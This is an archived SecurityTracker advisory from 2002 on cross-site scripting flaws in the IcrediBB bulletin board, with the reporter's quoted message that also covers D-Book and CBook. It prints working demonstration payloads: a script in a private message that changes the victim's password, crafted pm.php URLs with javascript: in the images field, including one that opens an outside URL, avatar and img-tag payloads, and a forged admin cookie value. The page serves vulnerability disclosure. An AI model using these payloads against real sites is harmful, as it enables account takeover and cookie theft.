SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   IcrediBB Vendors:   IcrediBB.com
IcrediBB Bulletin Board Allows Cross-Site Scripting Attacks to Steal User and Administrator Authentication Cookies
SecurityTracker Alert ID:  1004075
SecurityTracker URL:  http://securitytracker.com/id/1004075
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 17 2002
Impact:   Disclosure of authentication information, Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.1 beta
Description:   Several vulnerabilities were reported in the IcrediBB PHP-based bulletin board software. A remote user can conduct cross-site scripting attacks against IcrediBB users to gain access to any user's account, including an administrative user.

It is reported that the IcrediBB bulletin board software stores authentication tokens in user cookies. It is also reported that many components of the software do not filter user-supplied input, allowing a remote user to inject HTML containing malicious Javascript into a message so that, when the message is displayed by another target (victim) IcrediBB user, the Javascript is executed by the target user's browser. The code will originate from the site running IcrediBB and will run in the security context of that site. As a result, the code will be able to access the target user's cookies associated with that site.

Some demonstration exploit code is provided by the author of the report:

- To change password, in a private message :
<sc*ript>
window.open('usercp.php?function=changepass&newpassword=PASS&passverify=PASS&submitnewpass=Submit');
window.open('usercp.php?function=changepass&newpassword=PASS&passverify=PASS&submitnewpass=Submit');
window.open('usercp.php?function=changepass&newpassword=PASS&passverify=PASS&submitnewpass=Submit');
window.open('index.php?function=logout');
window.open('usercp.php?function=changepass&newpassword=PASS&passverify=PASS&submitnewpass=Submit');
</s*cript>

(without '*')

- In subject (private message) :
&lt;script&gt;ANYSCRIPT&lt;/script&gt;

- In webbrowser :

/pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:alert('hello')&message=MESSAGE&submitpm=Submit PM

/pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:window.open('http:%2F%2Fwww.url.com')&message=MESSAGE&submitpm=Submit PM

/pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:a='http:%2F%2Fwww.url.com'%3Bwindow.open(a)%3B&message=MESSAGE&submitpm=Submit PM

- In /usercp.php?function=avataroptions :
javascript:alert(%27HeLLo%27)

For additional details, see the author's original advisory (French language), available at:

http://www.ifrance.com/kitetoua/tuto/icrediBB.txt

Impact:   A remote user can conduct cross-site scripting attacks against IcrediBB users and administrators to cause arbitrary Javascript to be run on the target's computer to steal the target user's authentication cookies associated with the IcrediBB site. This allows the remote user to steal the authentication cookies and gain access to any user's account (including administrative users).
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.icredibb.com/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Underlying OS Comments:  PHP-based

Message History:   None.


 Source Message Contents

Subject:  Security holes : D-Book, CBook, IcrediBB




Product 1 :
D-Book
http://www.smartbb.net

Versions :
1.4 (and less ?)

Problems :
- XSS
- Admin access

Exploits :
- [img=javascript:alert(%27hum%27)]
- Cookie "logged,anyvalue" on admin.php

More details in french :
http://www.ifrance.com/kitetoua/tuto/D-Book.txt

translated by Google :
http://translate.google.com/translate?u=http%3A%
2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FD-
Book.txt&langpair=fr%7Cen&hl=fr&prev=%
2Flanguage_tools

****************************************
Product 2 :
CBook

Versions :
1.0.1 beta

Problems :
- XSS
- Access to an admin function (delete all entries)

Exploits :
- &lt;script&gt;ANYSCRIPT&lt;/script&gt; on profil
- http://www.site.com/index.php?Change=2

More details in french :
http://www.ifrance.com/kitetoua/tuto/Cbook.txt

translated by google :
http://translate.google.com/translate?u=http%3A%
2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%
2FCbook.txt&langpair=fr%7Cen&hl=fr&prev=%
2Flanguage_tools


***********************************************
Product 3:
IcrediBB Bulletin Board System
http://www.icredibb.com

Versions :
1.1 beta

Problems :
- Access to users/admins account
- XSS

Exploits :
- To change password, in a private message :
<sc*ript>
window.open('usercp.php?
function=changepass&newpassword=PASS&passve
rify=PASS&submitnewpass=Submit');
window.open('usercp.php?
function=changepass&newpassword=PASS&passve
rify=PASS&submitnewpass=Submit');
window.open('usercp.php?
function=changepass&newpassword=PASS&passve
rify=PASS&submitnewpass=Submit');
window.open('index.php?function=logout');
window.open('usercp.php?
function=changepass&newpassword=PASS&passve
rify=PASS&submitnewpass=Submit');
</s*cript>
(without '*')

- In subject (private message) :
&lt;script&gt;ANYSCRIPT&lt;/script&gt;

- In webbrowser :

/pm.php?
function=sendpm&to=VICTIM&subject=SUBJECT&im
ages=
javascript:alert('hello')
&message=MESSAGE&submitpm=Submit PM

/pm.php?
function=sendpm&to=VICTIM&subject=SUBJECT&im
ages=
javascript:window.open('http:%2F%2Fwww.url.com')
&message=MESSAGE&submitpm=Submit PM

/pm.php?
function=sendpm&to=VICTIM&subject=SUBJECT&im
ages=
javascript:a='http:%2F%2Fwww.url.com'%
3Bwindow.open(a)%
3B&message=MESSAGE&submitpm=Submit PM


- In /usercp.php?function=avataroptions :
javascript:alert(%27HeLLo%27)

More details in french :
http://www.ifrance.com/kitetoua/tuto/icrediBB.txt

translated by google :
http://translate.google.com/translate?u=http%3A%
2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%
2FicrediBB.txt&langpair=fr%7Cen&hl=fr&prev=%
2Flanguage_tools

**************************************************

frog-m@n




 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC